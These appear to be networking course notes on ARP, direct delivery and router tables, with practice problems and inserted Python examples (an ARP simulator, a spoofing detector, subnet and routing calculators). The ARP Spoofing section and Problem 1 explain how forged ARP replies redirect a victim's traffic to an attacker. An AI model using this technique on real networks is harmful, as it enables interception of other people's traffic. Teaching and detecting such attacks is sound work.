the correct association. This reply essentially says: "The user with IP address x has data link address y."
The respondent providing the correct association can be the target computer (the computer that owns the IP address x) or
a server that stores the full network association table.
This technique is used by the Internet's Address Resolution Protocol.
2. The Address Resolution Protocol (ARP) The Address Resolution Protocol (ARP) has two message types:
• A request message containing an IP address for which we want a data link layer address. An ARP request is broadcast
to all computers on the network.
• A response message, which contains the IP and matching data link layer address. Only the computer that corresponds
to the IP address sends a response with its data link layer address. The response is not broadcast, it is sent addressed
only to the user that sent the request.
The main use of ARP is to associate a logical software address with a hardware address; that is: find the hardware address of a
node when its IP address is known. Since these days most hardware addresses are Ethernet, ARP finds most use in associating
32 bit IP addresses to 48 bit Ethernet addresses.
Let's refine the pictures above, in terms of ARP. Suppose we have a network with User A, User B and three other unnamed
users. User A wants to send a packet to a user with IP address 142.33.68.23. To send the information, User A must learn the
Ethernet address for the user with IP address 142.33.68.23. User A sends an ARP request to all users in the local network.
Practice Problem 14.1
How can an ARP request be sent to all users in the local network?
Solution:
This ARP request is received by all users. Each of the users examines the IP address in the ARP request to see if that matches
their IP address. Let's say that User B has IP address 142.33.68.23. User B (and only User B) would send an ARP reply
containing his Ethernet address. This reply is not broadcast; it is sent in a frame addressed to User A's Ethernet address.
Note that ARP allows the seamless addition of new hosts while avoiding the need for a centralized database containing IP
address to Ethernet address pairings.
3. ARP Caching Most computer network communication involves a series of packet exchanges. During the first exchange,
a host learns the target host’s Ethernet address. But, what does it do for the second exchange? Suppose, in the picture above,
that User A has to send more data to IP address 142.33.68.23 a moment after the first exchange. It would be wasteful to have
to go through the whole ARP Request/ARP Reply rigmarole all over again.
To avoid excess ARP traffic, each user maintains a table of recently received IP address – Ethernet Address associations in a
table called an ARP cache. In the example above, User A would make the following entry in its ARP cache:
142.33.68.23 : 23:ef:40:7d:45:77
Before sending an ARP request, a user first checks its ARP cache to see if it already has the Ethernet address that it needs (i.e.,
the Ethernet address for a specific IP address).
ARP table entries can become incorrect without warning. For this reason, each entry in the ARP cache has a timer associated
with it. When the timer expires, the entry is deleted from the cache. Typical values for this timeout are 10 minutes.
Practice Problem 14.2
The Address Resolution Protocol works at which two layers?
Solution:
4. ARP Packet
An ARP request is encapsulated in an Ethernet frame as shown below.
[Figure 21.3: Encapsulation of ARP packet]
Forouzan, Data Communications and Networking, McGraw Hill, 2007
This frame is identified as an ARP packet by a specific entry in the Ethernet frame's Type field. The ARP packet format is
shown below:
[Figure 21.2: ARP message]
Forouzan, Data Communications and Networking, McGraw Hill, 2007
Practice Problem 14.3
How many bytes are in an ARP Request packet? How many bytes are in an ARP reply packet?
Solution:
Several of the fields in the ARP Request and ARP Reply will always be the same.
• The first field is the hardware type: for Ethernet, this will always be 1.
• The second field is the network layer protocol type: for IP this is always 0800 (hexadecimal).
• The third field is the length of the hardware address in bytes: for Ethernet, this will be 6.
• The fourth field is the length of the network layer protocol address in bytes: for IP this is always 4.
An ARP Request is differentiated from an ARP Reply by the entry in the Operation field: A 1 is placed in this field for ARP
Request packets, and a 2 is placed in this field for ARP reply packets.
Let's look at an example in gory detail. Suppose, in the picture below, User A has IP address N1 and Ethernet address L1 and
that User B has IP address N2 and Ethernet address L2.
Suppose User A wants to send important information to his friend, who he happens to know has IP address N2. But User A
does not know the proper Ethernet address. (Recall that User A cannot just put his information in an IP packet, and just transmit
the IP packet. User B's Network Interface card (NIC) expects to see an Ethernet frame. It will not know what to make of an
IP packet.)
User A would encapsulate an ARP request inside an Ethernet frame as shown below.
[Figure: ARP Request from User A, encapsulated in an Ethernet frame (value shown: L1)]
Note that in the picture above, the letter M is used to denote the Ethernet broadcast address FF:FF:FF:FF:FF:FF. The
broadcast address is placed in the field for the destination address in the Ethernet frame. Thus all other users—User B, User
X, User Y and User Z—will receive this frame and pass it up to the network layer for examination.
Note that User A has included his own Ethernet address and IP address (L1 and N1) in the ARP request message. Why would
he do this, if his goal is simply to determine the Ethernet address for the user with IP address N2?
The reason is this: If User A needs to send data to User B, it will very often mean that User B will have to send data to User A
soon thereafter. Most data exchanges are, after all, interactive. Thus, User B will likely need to know User A's IP address–Ethernet
address association. To save User B the trouble of having to send her own ARP request (for A's information) in the
future, User A will include its IP-Ethernet address pairing in its request for B's information.
Notice that all hosts on the network immediately learn IP address – Ethernet address association for User A. Thus all users
make the following entry in their ARP cache:
N1 : L1
Now, User B recognizes that the target IP address in the ARP Request is her IP address. Thus, it is User B's Ethernet address
that is being requested. So, User B will craft an ARP Reply packet as shown below.
[Figure: ARP Reply from User B, encapsulated in an Ethernet frame (values shown: L2, N2, L1, N1, L1, L2)]
To complete the story: After User A receives the ARP Reply from User B, User A will send the IP packet to User B by placing
the IP packet in the data field of an Ethernet frame.
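The request/reply exchange just described, together with the field values listed under "ARP Packet", as an added example; this is my code, not the notes' and not any real ARP implementation. Each host is a small object with an ARP cache. A request is built with the constant fields (hardware type 1, protocol type 0800, lengths 6 and 4, Operation 1), broadcast to every host on the segment, and answered only by the owner of the target IP address with a unicast reply (Operation 2); every host that sees the request caches the sender's pairing, as the notes describe. Assumptions of mine: the request's target hardware field is filled with zeros, the Ethernet frame check sequence is omitted, and all addresses except User B's 142.33.68.23 / 23:ef:40:7d:45:77 (which are the notes' own) are constructed.

```python
import struct

ETHERTYPE_ARP = 0x0806                  # Ethernet Type field value that marks an ARP packet
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"     # "M" in the notes' pictures
ARP_REQUEST, ARP_REPLY = 1, 2           # Operation field values


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """ARP message for Ethernet/IPv4: hardware type 1, protocol type 0x0800,
    hardware address length 6, protocol address length 4, then the four addresses."""
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))


def parse_arp(data: bytes) -> dict:
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", data[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet/IPv4 ARP is handled here")
    body = data[8:28]
    return {"op": op,
            "sender_mac": mac_str(body[0:6]), "sender_ip": ip_str(body[6:10]),
            "target_mac": mac_str(body[10:16]), "target_ip": ip_str(body[16:20])}


def ethernet_frame(dst_mac, src_mac, payload: bytes) -> bytes:
    """Destination, source, Type, data (frame check sequence omitted, an assumption)."""
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP) + payload


class Host:
    def __init__(self, name, mac, ip):
        self.name, self.mac, self.ip = name, mac, ip
        self.cache = {}                                     # ARP cache: ip -> mac

    def receive(self, frame: bytes):
        """Handle one frame off the wire; return a reply frame, or None."""
        dst = mac_str(frame[0:6])
        ethertype = struct.unpack("!H", frame[12:14])[0]
        if dst not in (self.mac, BROADCAST_MAC) or ethertype != ETHERTYPE_ARP:
            return None                                     # not for me, or not ARP
        msg = parse_arp(frame[14:])
        # Everyone who sees the message learns the sender's pairing (N1 : L1 in the notes).
        self.cache[msg["sender_ip"]] = msg["sender_mac"]
        if msg["op"] == ARP_REQUEST and msg["target_ip"] == self.ip:
            reply = build_arp(ARP_REPLY, self.mac, self.ip, msg["sender_mac"], msg["sender_ip"])
            return ethernet_frame(msg["sender_mac"], self.mac, reply)   # unicast, not broadcast
        return None


def arp_exchange(segment, requester: Host, target_ip: str):
    """One resolution on a shared segment; returns the MAC for target_ip, or None."""
    if target_ip in requester.cache:                        # cache hit: no request is sent
        return requester.cache[target_ip]
    request = build_arp(ARP_REQUEST, requester.mac, requester.ip, "00:00:00:00:00:00", target_ip)
    frame = ethernet_frame(BROADCAST_MAC, requester.mac, request)
    for host in segment:
        if host is requester:
            continue
        reply = host.receive(frame)
        if reply is not None:
            requester.receive(reply)
    return requester.cache.get(target_ip)


if __name__ == "__main__":
    # Constructed segment; User B's addresses are the ones used in the notes.
    a = Host("A", "02:00:00:00:00:0a", "142.33.68.11")
    b = Host("B", "23:ef:40:7d:45:77", "142.33.68.23")
    x = Host("X", "02:00:00:00:00:0c", "142.33.68.30")
    print("A resolved", b.ip, "to", arp_exchange([a, b, x], a, b.ip))
    print("B's cache:", b.cache, " X's cache:", x.cache)
```

Running it shows the side effect the notes point out: after one exchange, User B and the bystander User X both hold A's pairing, while only A holds B's, and a second call for the same address is answered from A's cache without any frame being sent.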
Practice Problem 14.4
In the protocol layering model of TCP/IP, how is a host identified:
(a) At the Network Layer
(b) At the Data Link Layer
Solution:
Practice Problem 14.5
What are the two types of messages used by the Address Resolution Protocol?
Solution:
Practice Problem 14.6
When a sender wants to find out what MAC address corresponds to an IP address, to which MAC address would she send an
ARP request? (Circle the appropriate answer(s))
(a) 0.0.0.0
(b) ff:ff:ff:ff:ff:ff
(c) 255.255.255.255
(d) 00:00:00:00:00:00
Solution:
Practice Problem 14.7
Can an ARP Reply be sent without an ARP request?
Solution:
5. ARP Spoofing A major flaw with ARP is that an ARP Reply message can be sent without a preceding ARP Request. To
see what problems might ensue, consider again our local network, for which we now know User A and User B's IP address and
Ethernet address pairing. We also indicate the IP address-Ethernet address pairing for User X, who is actually the Evil User!
Suppose User X (Evil User) sends an ARP Reply that, for practical purposes, says: IP address N2 is paired with Ethernet
address L3. Notice that this ARP Reply is not preceded by an ARP Request from any user. Nevertheless, all other users—
trusting souls that they are—will update their ARP cache with the entry:
N2 : L3
Note that this information pairing is not correct: the correct Ethernet address for User B (who has IP address N2) is L2, not
L3. So…why would the Evil User have sent this bad gouge to all users on this local network, corrupting everyone's ARP
cache?
He did this because he's EVIL! [24]
Suppose User A now wants to send an IP packet to his friend (User B) with IP address N2. User A will check his ARP cache
and see that the packet should be encapsulated in an Ethernet frame addressed to … L3 (Evil User). Thus the IP packet intended
for User B will instead be routed to the Evil User.
Sending an ARP Reply with an incorrect IP address–Ethernet address pairing with the intent to misdirect traffic is termed ARP
spoofing. If an attacker with Ethernet address <Attacker's Ethernet Address> wants to steal traffic from a user with
IP address <Victim's IP address>, he sends an ARP Reply saying:
IP address <Victim's IP address> is associated with Ethernet address <Attacker's Ethernet Address>.
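From the network administrator's side, the flaw just described (a reply that no request asked for) is exactly what to watch for. The following is an added example, mine and not the notes', of a passive check that could be run over ARP messages decoded from a capture: it flags replies that answer no recent request, replies sent to the broadcast address (see footnote 24), and replies that change an IP address–Ethernet address pairing already learned from a legitimate-looking reply. The event fields, the two-second request window and the sample capture (which reuses the notes' User B addresses) are all constructed.

```python
from dataclasses import dataclass

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_REQUEST, ARP_REPLY = 1, 2


@dataclass
class ArpEvent:
    """One ARP message as a sniffer such as Wireshark would decode it."""
    time: float        # seconds into the capture
    op: int            # 1 = request, 2 = reply
    eth_dst: str       # destination address of the Ethernet frame carrying the message
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


class ArpMonitor:
    """Passive check for the symptoms the notes describe: a reply nobody asked for,
    a reply sent to the broadcast address, or a reply that changes a pairing
    already learned."""

    REQUEST_WINDOW = 2.0   # seconds a request stays outstanding (assumed value)

    def __init__(self):
        self.pending = {}    # (ip being asked about, requester MAC) -> request time
        self.bindings = {}   # ip -> MAC, learned only from replies that answered a request
        self.alerts = []     # (time, kind, detail)

    def observe(self, ev: ArpEvent) -> None:
        if ev.op == ARP_REQUEST:
            self.pending[(ev.target_ip, ev.sender_mac)] = ev.time
            return
        if ev.op != ARP_REPLY:
            return
        # A legitimate reply answers a request that target_mac made about sender_ip.
        asked_at = self.pending.pop((ev.sender_ip, ev.target_mac), None)
        solicited = asked_at is not None and ev.time - asked_at <= self.REQUEST_WINDOW
        detail = f"{ev.sender_ip} claimed by {ev.sender_mac}"
        if not solicited:
            self.alerts.append((ev.time, "unsolicited ARP reply", detail))
        if ev.eth_dst == BROADCAST_MAC:
            self.alerts.append((ev.time, "ARP reply sent to broadcast", detail))
        known = self.bindings.get(ev.sender_ip)
        if known is None:
            if solicited:
                self.bindings[ev.sender_ip] = ev.sender_mac   # trust only answered replies
        elif known != ev.sender_mac:
            self.alerts.append((ev.time, "IP-MAC binding changed",
                                f"{ev.sender_ip}: {known} -> {ev.sender_mac}"))

    def alert_kinds(self):
        return [kind for _, kind, _ in self.alerts]


def run_monitor(events) -> ArpMonitor:
    """Replay decoded ARP messages in time order and return the monitor state."""
    monitor = ArpMonitor()
    for ev in sorted(events, key=lambda e: e.time):
        monitor.observe(ev)
    return monitor


# Constructed sample capture (not from the notes): A asks for N2, B answers, then a
# third host X twice claims N2 as its own, once unicast to A and once to broadcast.
A_MAC, A_IP = "02:00:00:00:00:0a", "142.33.68.11"
B_MAC, B_IP = "23:ef:40:7d:45:77", "142.33.68.23"
X_MAC = "02:00:00:00:00:0c"
SAMPLE_EVENTS = [
    ArpEvent(0.00, ARP_REQUEST, BROADCAST_MAC, A_MAC, A_IP, "00:00:00:00:00:00", B_IP),
    ArpEvent(0.01, ARP_REPLY, A_MAC, B_MAC, B_IP, A_MAC, A_IP),
    ArpEvent(5.00, ARP_REPLY, A_MAC, X_MAC, B_IP, A_MAC, A_IP),
    ArpEvent(6.00, ARP_REPLY, BROADCAST_MAC, X_MAC, B_IP, "00:00:00:00:00:00", "0.0.0.0"),
]

if __name__ == "__main__":
    for t, kind, detail in run_monitor(SAMPLE_EVENTS).alerts:
        print(f"t={t:5.2f}s  {kind}: {detail}")
```

The first two events produce no alert; each of X's replies produces several, and the learned pairing for N2 stays at B's address because the monitor never overwrites a binding on the strength of an unsolicited reply.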
Practice Problem 14.8
One of your crewmembers has downloaded ARP-spoofing software.
(a) What does ARP spoofing software do?
(b) What is one malevolent purpose he could use this for?
Solution:
II. Sending IP Packets to Users on Your Own Network
If a destination IP address is in our same network, we directly deliver the IP packet. This is called, shockingly, direct delivery.
In direct delivery, the destination is on the same network as the sender. No routers are involved as intermediaries.
How does the sender know the destination is on the same network?
The IP addresses of all machines on a single network will have the same network ID. So, the sender looks at the destination’s
network ID. Thus, a host can easily see if another host is directly connected.
How do we route to other hosts on the same network? Simple! The sender encapsulates the datagram in a data link frame,
binds the destination IP address to a physical hardware address, and sends the resulting frame directly to the destination.
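The network-ID test just described in code, added here as an example rather than taken from the notes. It also covers the block calculations the chapter problems ask for (mask, network address, broadcast address, first and last host address, number of addresses) and the dotted-decimal validity check from Security Exercise 13. Function names and all addresses are my own; the "usable hosts" count follows the notes' convention that the network and broadcast addresses are not assigned to hosts.

```python
def parse_ipv4(text: str) -> int:
    """Dotted decimal -> 32-bit integer; rejects a wrong number of octets
    and any octet outside 0..255."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError(f"{text!r}: an IPv4 address has exactly four octets")
    value = 0
    for octet in parts:
        if not octet.isdigit() or int(octet) > 255:
            raise ValueError(f"{text!r}: octet {octet!r} is not in 0..255")
        value = (value << 8) | int(octet)
    return value


def is_valid_ipv4(text: str) -> bool:
    try:
        parse_ipv4(text)
        return True
    except ValueError:
        return False


def to_dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def prefix_to_mask(prefix: int) -> int:
    """/n -> mask with n leading one bits (e.g. /28 -> 255.255.255.240)."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def mask_to_prefix(mask_text: str) -> int:
    """Dotted-decimal mask -> /n; a valid mask is a run of ones followed by zeros."""
    mask = parse_ipv4(mask_text)
    prefix = bin(mask).count("1")
    if mask != prefix_to_mask(prefix):
        raise ValueError(f"{mask_text} is not a valid mask: its one bits are not contiguous")
    return prefix


def is_valid_mask(mask_text: str) -> bool:
    try:
        mask_to_prefix(mask_text)
        return True
    except ValueError:
        return False


def block_info(cidr: str) -> dict:
    """Network ID, broadcast, first/last host and counts for an address written a.b.c.d/n."""
    ip_text, prefix_text = cidr.split("/")
    prefix = int(prefix_text)
    mask = prefix_to_mask(prefix)
    network = parse_ipv4(ip_text) & mask                 # host bits all zero
    broadcast = network | (~mask & 0xFFFFFFFF)           # host bits all one
    size = 1 << (32 - prefix)                            # 2^(host bits) addresses in the block
    return {
        "mask": to_dotted(mask),
        "network": to_dotted(network),
        "broadcast": to_dotted(broadcast),
        "first_host": to_dotted(network + 1) if size > 2 else None,
        "last_host": to_dotted(broadcast - 1) if size > 2 else None,
        "addresses": size,
        "usable_hosts": size - 2 if size > 2 else 0,     # network and broadcast are not assignable
    }


def same_network(ip_a: str, ip_b: str, prefix: int) -> bool:
    """Direct-delivery test: do both addresses share the network ID under this mask?"""
    mask = prefix_to_mask(prefix)
    return (parse_ipv4(ip_a) & mask) == (parse_ipv4(ip_b) & mask)


if __name__ == "__main__":
    # Constructed addresses, not the ones in the chapter problems.
    for key, value in block_info("192.0.2.200/28").items():
        print(f"{key:>13}: {value}")
    print("10.0.0.5 and 10.0.0.40 share a /27?", same_network("10.0.0.5", "10.0.0.40", 27))
```

The sender's decision is same_network(my_ip, destination_ip, my_prefix): True means direct delivery (resolve the destination's hardware address and send), False means the packet goes to a router.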
Practice Problem 14.9
Your IP Address is 10.16.58.92/27. Can you use direct delivery to send messages to the host 10.16.58.129?
Solution:
Practice Problem 14.10
Your IP Address is 10.226.58.15/24. Could you use direct delivery to send messages to the host 10.226.58.229?
Solution:
[24] Note that an ARP reply when properly used is always sent to an individual user. Malicious ARP replies can be sent to the
broadcast address.
III. Routing
If the destination IP address is not in our same network (i.e., if it does not have the same network ID), we cannot directly deliver
the IP packet. We must route the IP packet using routers: The source computer sends the IP packet to the first router, who
passes the IP packet to the next router, and so forth, until the final router delivers the IP packet to the destination.
Routers operate at the network layer; indeed, one of the key network layer functions is routing: choosing an appropriate path
for packet flow.
Forouzan, Data Communications and Networking, McGraw Hill, 2007
1. Routing Tables We route IP packets by using a routing table, which must (somehow) convey the route to the final
destination. Each entity (host or router) maintains an IP routing table which provides information on how to reach possible
destinations. A host or router consults a routing table when making routing decisions.
Consider this naïve proposal for the use of a routing table: Maintain in each entity a routing table which lists every possible
destination IP address, and the full path needed from the entity to reach each possible destination. In this scheme, a routing
table might have billions of entries (since there might be billions of IP addresses in use at any time), and each of these entries
would have multiple pieces of data associated with it (the full route to the destination for this entry in the table).
This approach is not practical; the resulting routing tables would be gargantuan. Think of how slow routing would be if the
decision on where to send each and every packet required consultation with a table of billions of entries. Moreover, think of
the problem of constantly updating these huge tables as IP addresses are reassigned to different hosts throughout the Internet.
So, early on, three clever ideas were employed to make routing tables as small as possible.
First clever idea: For each destination IP address, only store in the routing table the IP address of the next hop.
Consider the small network below which shows three networks interconnected with two routers: R1 and R2. Each of the three
networks has many hosts connected to it, but, for simplicity, we only show two hosts: Host A and Host B.
Figure 22.2 Route method versus next-hop method
Let's consider the routing table for Host A, and, in particular, let's look at the entry for Host B. Originally, the entry for Host
B would have been:
This entry means: To reach Host B, send the packet to router R1, who will in turn send it to router R2, who will then send it to
Host B.
The first clever idea recognizes that a host or router does not need to maintain information in its routing table about the full
path to a destination. Host A's routing table entry for Host B can be reduced to:
Router R1 will have its own routing table that will tell it that the next hop for destination Host B is router R2. R2 will have its
own routing table that will tell it that the next hop for destination Host B is direct delivery to Host B.
Second clever idea: Instead of having routing table entries for each and every destination host, store routing table entries
for destination networks.
Consider the network below which shows a portion of the routing table for Host A. Note that Host A has entries for Hosts B,
C and D.
Note that all three of these hosts (B, C and D) are on the same network (Network 2). All packets delivered to these three hosts
will be delivered to the same network. Thus, we can collapse the three entries for B, C and D into a single entry in the routing
table.
All entities that connect to the same physical network share a common prefix (the network ID). Thus, routing tables only need
to contain network prefixes, and not complete IP addresses. Thus routing decisions are made based on table lookup where
routing tables keep only the network portion of the IP addresses (so the size of the routing table is, at worst, proportional to the
number of networks, not the number of hosts).
Third clever idea: Default Routing
To avoid large routing tables, group multiple destinations into a single default case. That is, when we want to route a packet,
we first check to see if the destination network ID is in the routing table; if not, send the packet to the default router.
Consider Host A in the network below:
We see that Host A has a connection to Network 2 via router R1, and has a connection to the rest of the world via router R2.
It would make sense for Host A to have an entry in its routing table for Network 2. But it would make no sense for Host A to
have any entries for any other specific networks since any destination other than Network 2 will always be routed via router
R2. So, by default, if the destination is not Network 2, we should send the packet to R2.
Default routing is most useful when a host has a single connection to the Internet. Then routing is easy: If the destination's
network ID does not match mine, send the packet to the default router.
Summary
[Figure: Simplified forwarding module in classless addressing]
So, let's summarize the decisions that are made in routing, and show the form of the routing table.
Step 1. A packet shows up at a router X, needing to be routed to its final destination.
Step 2. Router X examines the destination's IP address and extracts the network address. In order to extract the
network address, the routing table for each network address must have the associated mask. So, a column
for the mask is included as the first column in the routing table for Router X, shown below.
So, Router X applies the mask in the first line of the table to the destination IP address:
and checks to see if the extracted network ID matches the Network address shown on the first line:
If it matches … Joy! … send the packet to the Next-hop address which is on this Interface:
If it does not match, repeat the process for the second line of the routing table.
Practice Problem 14.11
Figure 22.6 Configuration for Example 22.1
(Based on an example in Forouzan, Data Communications and Networking, McGraw Hill) The router R1 in the figure below
connects the four different networks shown. The four networks connect to the router’s four interfaces, labeled m0, m1, m2
and m3.
[Figure 22.6 residue: router R1 with address 180.70.65.135/26 on interface m0, attached to network 180.70.65.128/26; interfaces m0 through m3]
(a)
Why does the router R1 have 4 different IP addresses?
Solution:
(b)
How would you verify that the router address 180.70.65.135/26 on the m0 interface is indeed on the network
180.70.65.128/26 ?
Solution:
(c)
Your friend says: "Wait just a minute! The two different networks 180.70.65.128/26 and 180.70.65.192/26 look very similar. Are these really two different networks…i.e., are these really two non-overlapping blocks of addresses?" How would you reply?
Solution:
(d)
Construct the routing table.
[Table 22.1 Routing table for router R1 in Figure 22.6 (blank, to be filled in)]
We will see later that it is best to order the table by decreasing mask value…but let's proceed.
(e)
Suppose an IP packet with destination IP address 180.70.65.140 arrives at router R1. Explain how the routing
table is used to make a routing decision.
Solution:
(f)
Suppose an IP packet with destination IP address 201.4.22.35 arrives at router R1. What does it do?
Solution:
2. Address Aggregation
Consider the network below, examining also the routing table for router R2.
Figure 22.7 Address aggregation (from Forouzan, Data Communications and Networking, McGraw Hill, 2007)
[Figure residue: routing table for R2 with four network entries, each with next hop R1 on interface m0]
Notice that the four addresses are disposed of in the same way: place on interface m0. Let's look at just the last octet of these
four network addresses:
140.24.7.0    last octet: 0 0 0 0 0 0 0 0
140.24.7.64   last octet: 0 1 0 0 0 0 0 0
140.24.7.128  last octet: 1 0 0 0 0 0 0 0
140.24.7.192  last octet: 1 1 0 0 0 0 0 0
Note that the first two bits in this fourth octet are part of the mask (which is /26). But examine these two bits carefully! Any
values of these two bits (00, 01, 10, 11) yield the same result: Send it out on interface m0. Since the values of these two bits
do not need to be considered (since they can take on any of the four possibilities while yielding the same routing decision) we
can move the mask up to /24 and consolidate these four entries on a single line:
[Figure residue: consolidated routing table entry for R2, network 140.24.7.0/24, next hop R1, interface m0]
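To make the "bits that do not affect the decision" argument concrete, here is an added Python example (not from the notes or from Forouzan) that performs the aggregation on the four entries above. It uses the standard library's ipaddress module; the router name R1 and interface m0 are taken from the figure, while the interface label m1 for the R3 entry in the second table is an assumption.

```python
import ipaddress
from itertools import groupby

# R2's table from Figure 22.7 before aggregation: four /26 blocks, all
# forwarded to R1 on interface m0.  "R1" is the router name from the figure
# (its address is not given in the notes).
ROUTES_BEFORE = [
    ("140.24.7.0/26",   "R1", "m0"),
    ("140.24.7.64/26",  "R1", "m0"),
    ("140.24.7.128/26", "R1", "m0"),
    ("140.24.7.192/26", "R1", "m0"),
]

# The same table after Organization 4 is reached through R3 instead (the
# situation in the Longest Mask Matching section below); interface m1 is assumed.
ROUTES_AFTER_SPLIT = ROUTES_BEFORE[:3] + [("140.24.7.192/26", "R3", "m1")]


def aggregate(routes):
    """Merge rows with the same (next hop, interface) into the fewest covering
    prefixes.  collapse_addresses only joins blocks when together they form one
    aligned block, so a merged row never sends any address somewhere new."""
    key = lambda row: (row[1], row[2])
    merged = []
    for (next_hop, interface), rows in groupby(sorted(routes, key=key), key=key):
        networks = [ipaddress.ip_network(row[0]) for row in rows]
        for net in ipaddress.collapse_addresses(networks):
            merged.append((str(net), next_hop, interface))
    return merged


def free_bits(routes):
    """How many leading mask bits can be dropped for a group of same-length
    prefixes: the trailing mask bits that take on every possible value across
    the group (the 00/01/10/11 observation in the notes).  Returns 0 when the
    group does not form a single aligned block."""
    networks = [ipaddress.ip_network(row[0]) for row in routes]
    collapsed = list(ipaddress.collapse_addresses(networks))
    if len(collapsed) != 1:
        return 0
    return networks[0].prefixlen - collapsed[0].prefixlen


if __name__ == "__main__":
    print("before split:", aggregate(ROUTES_BEFORE), "free bits:", free_bits(ROUTES_BEFORE))
    print("after split: ", aggregate(ROUTES_AFTER_SPLIT))
```

With all four /26 blocks going to R1 the example collapses them to 140.24.7.0/24 and reports two free bits (/26 to /24), as in the notes. Once the .192 block goes to R3, exact aggregation of the remaining three yields 140.24.7.0/25 plus 140.24.7.128/26; the notes instead keep the single /24 entry and rely on longest mask matching, covered in the next section.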
Practice Problem 14.12
Given the following diagram:
Use the technique of address aggregation to create the routing table for Router R2 with the minimum number of entries.
Solution:
3. Longest Mask Matching
Let's consider now the following network previously referenced, where Organization 4 has split off while keeping its IP address block and is accessed now via router R3.
[Figure: Longest mask matching]
Router R2 has a routing table pictured below where Address Aggregation has been applied to the networks of Organization 1, Organization 2 and Organization 3, which are now listed under mask /24.
[Figure residue: routing table for R2 with the /24 aggregate entry (next hop R1) listed before the /26 entry for Organization 4 (next hop R3)]
Suppose a packet with destination address 140.24.7.200 arrives at router R2. (It is left as an exercise for the student to
show that address 140.24.7.200 belongs to network 140.24.7.192/26.) What happens? By applying the mask listed in the
routing table for R2, we see the IP packet is routed to the wrong location – to router R1. How can we fix this problem?
To prevent this problem, routing tables are sorted from longest mask to shortest mask. This principle is called longest mask
matching. So the corrected routing table for R2 would be:
[Figure residue: corrected routing table for R2, the /26 entry (next hop R3) now listed before the /24 entry (next hop R1)]
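The following added Python example (not from the notes) implements the forwarding procedure from the Summary above, Step 1 and Step 2 (apply the mask on each row, compare the extracted network ID, stop at the first match), and then shows why the row order matters for the R2 table just discussed. The network addresses and next-hop router names come from the figures; the interface labels and the default row (mask /0, the "third clever idea") are assumptions added for illustration.

```python
import ipaddress


def network_id(dest, prefix_len):
    """Step 2 of the Summary: AND the destination with a /prefix_len mask and
    return the resulting network address in dotted decimal."""
    mask = (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF
    return str(ipaddress.IPv4Address(int(ipaddress.IPv4Address(dest)) & mask))


def forward(table, dest):
    """Walk the rows top to bottom; the first row whose network address equals
    the masked destination decides the next hop and interface.  Returns None
    when no row (not even a default row) matches."""
    for prefix_len, network, next_hop, interface in table:
        if network_id(dest, prefix_len) == network:
            return next_hop, interface
    return None


def longest_mask_first(table):
    """Longest mask matching: order rows by decreasing mask length so the most
    specific network is tried first."""
    return sorted(table, key=lambda row: row[0], reverse=True)


# Router R2's table as the notes describe it after aggregation and after
# Organization 4 moved behind R3: the /24 aggregate (next hop R1) listed
# before the /26 block (next hop R3).  Next hops are the router names from
# the figure; the interface labels and the default row are assumptions.
R2_AS_LISTED = [
    (24, "140.24.7.0",   "R1", "m0"),
    (26, "140.24.7.192", "R3", "m1"),
    (0,  "0.0.0.0",      "default router", "m2"),
]


if __name__ == "__main__":
    # 140.24.7.200 belongs to Organization 4; 10.1.2.3 is a constructed
    # address that matches nothing but the default row.
    for dest in ("140.24.7.200", "140.24.7.20", "10.1.2.3"):
        print(dest,
              "as listed:", forward(R2_AS_LISTED, dest),
              "| longest mask first:", forward(longest_mask_first(R2_AS_LISTED), dest))
```

Run as listed, 140.24.7.200 masked with /24 gives 140.24.7.0, which matches the first row, so the packet goes to R1, the wrong router. After longest_mask_first the /26 row is tried first, 140.24.7.200 masked with /26 gives 140.24.7.192, and the packet goes to R3. The /0 row masks every destination to 0.0.0.0, so it always matches and therefore must be last, which the sort guarantees.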
Problems
1.
Given the following ARP table, make the necessary change(s) to cause all Ethernet traffic destined for 192.168.14.10
to flow to you (192.168.14.13) instead.
IP              MAC
192.168.14.8    AA:BB:CC:DD:EE:FF
192.168.14.9    AA:BB:AA:BB:AA:BB
192.168.14.10   CC:DD:CC:DD:CC:DD
192.168.14.12   EE:FF:EE:FF:EE:FF
192.168.14.13   A4:B5:C6:D7:E8:F9
192.168.14.21   C6:D7:C6:D7:C6:D7
192.168.14.25   E8:F9:E8:F9:E8:F9
2.
Why is the destination hardware address field of an ARP request message filled with all zeroes?
3.
Why is an ARP request message sent to the broadcast hardware address?
4.
Combine these three blocks of addresses into a single block:
18.45.24.0/26
18.45.24.64/26
18.45.24.128/25
5.
Construct the routing table for router RB in the picture shown below.
6.
Suppose router RB in Problem 5 receives a packet with a destination address 3.3.3.38. Explain how the router uses
its routing table to decide where to send this packet.
7.
What feature of the Address Resolution Protocol makes it particularly vulnerable to a spoofing attack?
Security Exercise 14
Part I: The Geography of the Internet
At this point you should appreciate that the Internet is, to a great extent, a large collection of routers along with the
interconnecting media (copper wires, fiber optic cables, and, as we will see later in the course, wireless links). We have talked
about the Internet (its routers, its interconnecting media) within the confines of the lecture notes and within the confines of
mathematical algorithms. Which may leave you wondering: Where is the Internet physically? And what does it look like
geographically?
The original vision for the Internet was that it would be a small enterprise, and would appear somewhat flat: each router
would be just as important as any other router. The original intent was that the network would be fully distributed and
